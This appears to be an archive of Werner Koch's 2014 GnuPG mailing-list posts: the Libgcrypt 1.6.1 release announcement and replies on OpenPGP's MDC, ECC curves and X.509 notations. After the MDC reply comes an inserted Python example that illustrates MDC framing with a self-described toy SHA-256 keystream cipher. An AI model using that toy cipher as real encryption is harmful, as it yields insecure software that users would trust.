Libgcrypt is a general purpose library of cryptographic building blocks. It does not provide any implementation of OpenPGP or other protocols. Thorough understanding of applied cryptography is required for proper use of Libgcrypt.

Noteworthy changes in version 1.6.1 (2014-01-29)
================================================

 * Added emulation for broken Whirlpool code prior to 1.6.0.
 * Improved performance of KDF functions.
 * Improved ECDSA compliance.
 * Fixed locking for Windows and non-ELF Pthread systems (regression in 1.6.0).
 * Fixed message digest lookup by OID (regression in 1.6.0).
 * Fixed a build problem on NetBSD.
 * Fixed memory leaks in ECC code.
 * Fixed some asm build problems and feature detection bugs.
 * Interface changes relative to the 1.6.0 release:
   GCRY_MD_FLAG_BUGEMU1           NEW (minor API change).

Download
========

Source code is hosted at the GnuPG FTP server and its mirrors as listed at http://www.gnupg.org/download/mirrors.html . On the primary server the source tarball and its digital signature are:

 ftp://ftp.gnupg.org/gcrypt/libgcrypt/libgcrypt-1.6.1.tar.bz2 (2413k)
 ftp://ftp.gnupg.org/gcrypt/libgcrypt/libgcrypt-1.6.1.tar.bz2.sig

That file is bzip2 compressed. A gzip compressed version is here:

 ftp://ftp.gnupg.org/gcrypt/libgcrypt/libgcrypt-1.6.1.tar.gz (2872k)
 ftp://ftp.gnupg.org/gcrypt/libgcrypt/libgcrypt-1.6.1.tar.gz.sig

Alternatively you may upgrade using this patch file:

 ftp://ftp.gnupg.org/gcrypt/libgcrypt/libgcrypt-1.6.0-1.6.1.diff.bz2 (244k)

In order to check that the version of Libgcrypt you are going to build is an original and unmodified one, you can do it in one of the following ways:

 * Check the supplied OpenPGP signature. For example to check the signature of the file libgcrypt-1.6.1.tar.bz2 you would use this command:

     gpg --verify libgcrypt-1.6.1.tar.bz2.sig

   This checks whether the signature file matches the source file. You should see a message indicating that the signature is good and made by the release signing key 4F25E3B6 which is certified by my well known key 1E42B367. To retrieve the keys you may use the command

     gpg --fetch-key finger:w...@g10code.com

 * If you are not able to use GnuPG, you have to verify the SHA-1 checksum:

     sha1sum libgcrypt-1.6.1.tar.bz2

   and check that the output matches the first line from the following list:

   f03d9b63ac3b17a6972fc11150d136925b702f02  libgcrypt-1.6.1.tar.bz2
   fe6d442881a28a37d16348cdbf96b41b8ef38ced  libgcrypt-1.6.1.tar.gz
   35d002247186884ba3730c91f196a5de48c3fcf8  libgcrypt-1.6.0-1.6.1.diff.bz2

Copying
=======

Libgcrypt is distributed under the terms of the GNU Lesser General Public License (LGPLv2.1+). The helper programs as well as the documentation are distributed under the terms of the GNU General Public License (GPLv2+). The file LICENSES has notices about contributions that require these additional notices are distributed.

Support
=======

For help on developing with Libgcrypt you should read the included manual and optionally ask on the gcrypt-devel mailing list [1].

A listing with commercial support offers for Libgcrypt and related software is available at the GnuPG web site [2].

The driving force behind the development of Libgcrypt is my company g10 Code. Maintenance and improvement of Libgcrypt and related software takes up most of our resources. To allow us to continue our work on free software, we ask to either purchase a support contract, engage us for custom enhancements, or to donate money:

  http://g10code.com/gnupg-donation.html

Thanks
======

Many thanks to all who contributed to Libgcrypt development, be it bug fixes, code, documentation, testing or helping users.

Happy hacking,

  Werner

[1] http://lists.gnupg.org/mailman/listinfo/gcrypt-devel
[2] http://www.gnupg.org/service.html

___
Gnupg-announce mailing list
gnupg-annou...@gnupg.org
http://lists.gnupg.org/mailman/listinfo/gnupg-announce
Re: cryptanalysis question: Does knowing some of the content of the message make the full message vulnerable to decryption?
On Fri, 31 Jan 2014 08:39, micha...@gmx.de said:

> you are a legitimate sender. I don't know how gpg does it, in academic signature I use an hmac to protect solely symmetrically enciphered

OpenPGP defines an MDC feature to detect tampering with the encrypted message. It works by appending the SHA-1 digest to the plaintext and including it in the encryption process. On decryption the decrypted plaintext is hashed again and the digest compared to the just decrypted digest. This deliberately works without a key (as in a MAC) to provide deniability for an encrypted-only message. The MDC feature has been in use for about 14 years. RFC-4880 also has the details.

Salam-Shalom,

   Werner
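The MDC construction Werner describes, as an added example that is not part of this thread or of GnuPG's own code: it builds and verifies the RFC 4880 §5.13 framing (random prefix, two quick-check bytes, data, the 0xD3 0x14 MDC packet header, then a SHA-1 over everything before it) without any key, so a flipped ciphertext bit is detected on decryption. The stream cipher used here is a constructed stand-in for OpenPGP's CFB mode, not the real cipher, and all keys and messages are made up.

```python
import hashlib
import os

# RFC 4880 §5.13 framing of an MDC-protected body (this is what gets encrypted):
#   prefix || prefix[-2:] || data || 0xD3 0x14 || SHA-1(everything before the digest)
# 0xD3 0x14 is the header of the MDC packet (packet tag 19, length 20).
MDC_HEADER = b"\xd3\x14"
BLOCK_SIZE = 16  # block size of the session cipher (AES); the random prefix is one block

def mdc_protect(data, prefix=None):
    """Build the plaintext to encrypt: random prefix, quick-check repeat, data, MDC packet."""
    if prefix is None:
        prefix = os.urandom(BLOCK_SIZE)
    body = prefix + prefix[-2:] + data + MDC_HEADER
    return body + hashlib.sha1(body).digest()

def mdc_verify(plaintext):
    """Recover data from a decrypted body; raise ValueError if the MDC does not match."""
    body, digest = plaintext[:-20], plaintext[-20:]
    if body[-2:] != MDC_HEADER:
        raise ValueError("MDC packet header missing")
    if hashlib.sha1(body).digest() != digest:  # keyless check: integrity, not authentication
        raise ValueError("MDC mismatch: message was modified")
    if body[BLOCK_SIZE:BLOCK_SIZE + 2] != body[BLOCK_SIZE - 2:BLOCK_SIZE]:
        raise ValueError("prefix quick check failed")
    return body[BLOCK_SIZE + 2:-len(MDC_HEADER)]

def toy_stream_xor(key, data):
    """Constructed stand-in for OpenPGP's CFB mode (NOT the real cipher): SHA-256 counter keystream."""
    out = bytearray()
    for i in range(0, len(data), 32):
        keystream = hashlib.sha256(key + i.to_bytes(8, "big")).digest()
        out += bytes(a ^ b for a, b in zip(data[i:i + 32], keystream))
    return bytes(out)

def encrypt_with_mdc(key, data):
    return toy_stream_xor(key, mdc_protect(data))

def decrypt_with_mdc(key, ciphertext):
    return mdc_verify(toy_stream_xor(key, ciphertext))

def tamper_detected(key, ciphertext, index):
    """Flip one ciphertext bit at `index` and report whether decryption rejects the result."""
    forged = bytearray(ciphertext)
    forged[index] ^= 0x01
    try:
        decrypt_with_mdc(key, bytes(forged))
        return False
    except ValueError:
        return True
```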
Re: BoF at FOSDEM ?
On Sat, 1 Feb 2014 14:13, mar...@martinpaljak.net said:

> Too bad I missed. Where did you get with the ECC discussion?

I merely reported about the status and that I think it is better to wait a few weeks until the I-D for the new curves is more complete. Then we can start to implement that. Kristian reported that the keyservers do not yet fully support ECC (required for keyid and fingerprints) but that should not be a showstopper. Deployment of new keyserver code is happening much faster than in the past.

We were about 12 people at the BoF and from their comments I read that non-NIST curves should be the default. But first of all I need to fix some things I broke in the last weeks.

We also talked about a possible 1.5 release to make 1.4 maintenance easier by switching to Libgcrypt. This would save us from maintaining a completely detached branch of crypto code for 1.4 and allow adding ECC support to GnuPG-1.

Shalom-Salam,

   Werner
Re: making the X.509 infrastructure available for OpenPGP
On Tue, 4 Feb 2014 17:09, d...@fifthhorseman.net said:

> I don't know of a formalized way to do the other mapping, but it seems like it would be pretty straightforward to embed the full X.509 certificate in a notation packet on a self-sig (presumably a self-sig

PGP does this. IIRC, Hal Finney once posted the specs for this to the OpenPGP WG. Unfortunately I can't find it in my archives. It was a pretty obvious thing, though.

Salam-Shalom,

   Werner
Re: making the X.509 infrastructure available for OpenPGP
On Wed, 5 Feb 2014 06:03, d...@fifthhorseman.net said:

> Werner recently (in message ID 87zjmv127f@vigenere.g10code.de) indicated his acceptance of a notation named extended-us...@gnupg.org with a value that can be set to bitcoin. Maybe the same notation

We can do that as soon as gniibe has finished his work.

> could be used to indicate s/mime-sign or s/mime-encrypt for these

No problem. But name it cms-sign and cms-encrypt. CMS is used by S/MIME but can be and is used standalone. Same as with OpenPGP and PGP/MIME.

Shalom-Salam,

   Werner